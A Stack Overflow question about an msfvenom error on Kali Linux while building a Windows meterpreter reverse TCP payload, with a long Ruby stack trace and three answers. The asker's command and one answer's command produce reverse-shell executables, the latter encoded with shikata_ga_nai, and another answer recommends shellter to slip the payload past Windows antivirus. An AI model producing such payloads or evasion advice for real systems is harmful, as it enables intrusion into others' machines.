-2

So I just installed Kali Linux Rolling on my Dell Inspiron 5000 Series, Intel Core I5 (8th Generation)! And while I was trying to create a Windows Reverse TCP Payload in MSFVenom, One of the best Payload Creation Tools that comes with the hacking OS, I encountered an error. This is what I typed in:

root@GetOffMyLawnBish:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.100 LPORT=443 -f exe > Desktop/localpayload.exe

And this is what I got back:

/usr/share/metasploit-framework/lib/msf/core/payload/android.rb:92:in `not_after=': bignum too big to convert into `long' (RangeError)
from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:92:in `sign_jar'
from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:123:in `generate_jar'
from /usr/share/metasploit-framework/modules/payloads/singles/android/meterpreter_reverse_http.rb:50:in `generate_jar'
from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:38:in `generate'
from /usr/share/metasploit-framework/lib/msf/core/payload.rb:204:in `size'
from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:91:in `block in recalculate'
from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `each_pair'
from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `recalculate'
from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:251:in `block in load_modules'
from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `each'
from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `load_modules'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:119:in `block in load_modules'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `each'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `load_modules'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `each'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `add_module_path'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `block in init_module_paths'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `each'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:121:in `simplify'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:73:in `create'
from /usr/bin/msfvenom:36:in `init_framework'
from /usr/bin/msfvenom:45:in `framework'
from /usr/bin/msfvenom:327:in `<main>'

Does anyone have any Idea what is going on here? Please let me know!

Oh and BTW I already created a Public Payload and this was going to be my Local Payload, but the weird thing is that the public one finished with no problems what so ever, but as soon as I change the IPAddress to my local one it gives me an error :(.

  • 1
    Stack Overflow is a site for programming and development questions. This question appears to be off-topic because it is not about programming or development. See [What topics can I ask about here](http://stackoverflow.com/help/on-topic) in the Help Center. Perhaps [Super User](http://superuser.com/) or [Unix & Linux Stack Exchange](http://unix.stackexchange.com/) would be a better place to ask. – jww Apr 10 '18 at 09:30

3 Answers3

1

This is a problem that occurs on the 32 bit version. If it doesn't matter to you, try to use the 64 bit version.

If you have to use 32bit, then you could change the /usr/share/metasploit-framework/lib/msf/core/payload/android.rb file (at around line 87) from

cert.not_after = cert.not_before + 3600*24*365*20 # 20 years

to

cert.not_after = cert.not_before + 3600*24*365*2 # 2 years

Please keep in mind that this could affect the reliance of android payloads.

kappadoky
  • 321
  • 2
  • 12
-1

The simplest of virus scanners and native windows scanners pick up this payload and set off red flags like crazy even using the encoder.

I recommend you download shellter and use it to mask your payload inside of a executable that windows will let through. Pretty much anything will work.

Plus it just has you use numerical multiple choice selections of payloads.

Easy and effective

goose goose
  • 86
  • 3
  • 15
-2

You can run under the command.

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -a x86 --platform windows LHOST=192.168.1.5 LPORT=443 -f exe > malicious file.exe

Community
  • 1
  • 1